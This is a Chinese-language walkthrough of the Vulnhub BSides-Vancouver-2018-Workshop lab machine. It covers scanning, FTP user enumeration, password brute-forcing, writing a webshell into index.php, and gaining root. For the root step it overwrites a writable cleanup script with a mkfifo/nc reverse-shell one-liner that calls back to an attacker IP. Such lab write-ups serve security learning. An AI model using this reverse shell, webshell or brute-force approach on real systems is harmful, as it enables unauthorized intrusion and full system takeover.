Vulnhub靶机第十二关

Vulnhub靶机 BSides-Vancouver-2018-Workshop
靶机说明
靶机用ValualBox创建,目标是在其上获得root级访问。
目标
Boot to root:获得root权限和Flag。
运行环境
靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥
接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。
攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、
Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全
面的渗透工具。
老规矩nmap 扫描ip和获取详细信息
Vulnhub靶机第十二关_第1张图片
发现21端口开着
访问一下
ftp:192.168.56.102
发现五个账户
Vulnhub靶机第十二关_第2张图片
爆破密码成功
Vulnhub靶机第十二关_第3张图片
接着爆破后台密码
登录成功
Vulnhub靶机第十二关_第4张图片
开启nc监听
在index.php页面写入大马
访问index.php
成功获取shell
反弹交互式shell: python -c ‘import pty; pty.spawn("/bin/bash")’
Vulnhub靶机第十二关_第5张图片
尝试ssh连接
Vulnhub靶机第十二关_第6张图片
切换到root用户
Vulnhub靶机第十二关_第7张图片
查看flag
Vulnhub靶机第十二关_第8张图片
将获得的shell 提升至root 权限
访问/usr/local/bin/cleanup
发现权限很高,可以执行读写
Vulnhub靶机第十二关_第9张图片
发现一段清理Apache日志的脚本
Vulnhub靶机第十二关_第10张图片
利用他反弹shell获取root权限,修改其内容为
写入echo ‘#!/bin/sh’ >cleanup
写入echo ‘rm /tmp/d;mkfifo /tmp/d;cat /tmp/d|/bin/sh -i 2>&1|nc 192.168.56.1 1234 > /tmp/d’ >>cleanup
开启nc
再次访问 cat cleanup
成功获得root权限
Vulnhub靶机第十二关_第11张图片
Vulnhub靶机第十二关_第12张图片

你可能感兴趣的:(Vulnhub靶机第十二关,安全)